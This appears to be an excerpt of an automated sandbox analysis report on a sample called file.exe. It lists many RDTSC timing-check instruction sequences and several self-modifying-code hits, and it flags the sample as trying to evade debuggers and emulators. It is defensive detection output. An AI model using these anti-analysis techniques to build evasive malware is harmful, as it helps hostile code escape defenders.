                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D3A7 second address: 127D3AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D66F second address: 127D674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D98E second address: 127D992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D992 second address: 127D9B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0790D58126h 0x00000008 jmp 00007F0790D58134h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jno 00007F0790D58126h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280E8E second address: 1280EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0790D580ADh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280EA1 second address: 1280EC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0790D58138h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280602 second address: 1280608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280608 second address: 1280635 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F0790D5812Bh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F0790D58126h 0x0000001d jmp 00007F0790D5812Ah 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280635 second address: 128063F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128063F second address: 1280650 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0790D5812Ch 0x00000008 js 00007F0790D58126h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12807C1 second address: 12807C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128093E second address: 1280949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0790D58126h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280949 second address: 128094E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128094E second address: 1280979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0790D58126h 0x0000000a pop edi 0x0000000b push esi 0x0000000c jmp 00007F0790D58137h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280979 second address: 1280980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280C2D second address: 1280C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280C33 second address: 1280C39 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1283FB1 second address: 1283FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0790D5812Dh 0x0000000d pop edi 0x0000000e push eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12895D5 second address: 12895EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0790D580B0h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A5C6 second address: 128A5E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58131h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0790D5812Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AF1F second address: 128AF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0790D580ACh 0x0000000a jc 00007F0790D580A6h 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F0790D580B1h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b jnp 00007F0790D580A6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AF4C second address: 128AF6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F0790D58126h 0x00000010 jmp 00007F0790D58131h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AF6D second address: 128AF8E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0790D580A6h 0x00000008 jmp 00007F0790D580ADh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 js 00007F0790D580A6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128FFE5 second address: 128FFF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0790D5812Ah 0x0000000a pop edi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129317D second address: 1293183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12932BE second address: 12932DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0790D5812Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F0790D58126h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12932DD second address: 12932E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129346E second address: 129349A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0790D5812Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0790D58138h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129349A second address: 12934BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F0790D580A6h 0x0000000e jmp 00007F0790D580B1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12938EE second address: 12938FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0790D58126h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12938FF second address: 1293922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F0790D580A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293C1B second address: 1293C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0790D58138h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A1DE second address: 129A1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0790D580A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A360 second address: 129A364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A364 second address: 129A36E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AA65 second address: 129AA69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AA69 second address: 129AA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D580B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AA80 second address: 129AA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0790D5812Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AA93 second address: 129AAE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0790D580B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F0790D580BFh 0x00000011 jmp 00007F0790D580B9h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jnp 00007F0790D580CCh 0x0000001e pushad 0x0000001f jnl 00007F0790D580A6h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2ACA second address: 12A2ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2ACE second address: 12A2B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0790D580B8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2B01 second address: 12A2B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F0790D58128h 0x0000000e jng 00007F0790D58128h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2B1F second address: 12A2B33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0790D580B2h 0x0000000c jl 00007F0790D580A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B022E second address: 12B0238 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0238 second address: 12B023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B32E0 second address: 12B3307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D5812Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0790D5812Fh 0x00000011 jno 00007F0790D58126h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B3307 second address: 12B332C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0790D580AEh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B332C second address: 12B3332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCC73 second address: 12BCC8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580ADh 0x00000007 jbe 00007F0790D580A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCC8D second address: 12BCC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46EB second address: 12C46F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46F5 second address: 12C4707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F0790D58126h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4707 second address: 12C4719 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4719 second address: 12C471F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C458F second address: 12C459E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0790D580A6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C459E second address: 12C45A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE150 second address: 12CE190 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0790D580C5h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F0790D580B2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC9D3 second address: 12CC9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC9D7 second address: 12CC9E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC9E5 second address: 12CC9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F0790D58126h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CCCD2 second address: 12CCCE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0790D580B1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CCCE9 second address: 12CCCED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CCCED second address: 12CCCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CCCF7 second address: 12CCCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD00D second address: 12CD02E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F0790D580BAh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD02E second address: 12CD038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD14B second address: 12CD155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0790D580A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD155 second address: 12CD15F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD408 second address: 12CD40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD40E second address: 12CD412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD412 second address: 12CD441 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0790D580B6h 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F0790D580A6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD441 second address: 12CD449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDE7C second address: 12CDE81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D25B7 second address: 12D25BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EEC3B second address: 12EEC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EEC41 second address: 12EEC45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDB33 second address: 12FDB5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0790D580B4h 0x00000009 jmp 00007F0790D580AFh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDB5A second address: 12FDB5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDFAD second address: 12FDFB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE56A second address: 12FE572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE80F second address: 12FE815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13003F8 second address: 13003FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130498E second address: 1304993 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304C2B second address: 1304C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0790D58128h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D373Bh], eax 0x00000028 push dword ptr [ebp+122D5351h] 0x0000002e add dh, 00000010h 0x00000031 call 00007F0790D58129h 0x00000036 jmp 00007F0790D58130h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304C83 second address: 1304C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304C87 second address: 1304C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1306201 second address: 130620C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130620C second address: 130622C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D5812Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F0790D58126h 0x00000011 jnp 00007F0790D58126h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0355 second address: 4FB0359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0359 second address: 4FB0368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D5812Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB044A second address: 4FB044E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB044E second address: 4FB0461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D5812Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0461 second address: 4FB0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0467 second address: 4FB046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225BE4 second address: 1225BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1071841 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1244553 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1221AEE instructions caused by: Self-modifying code
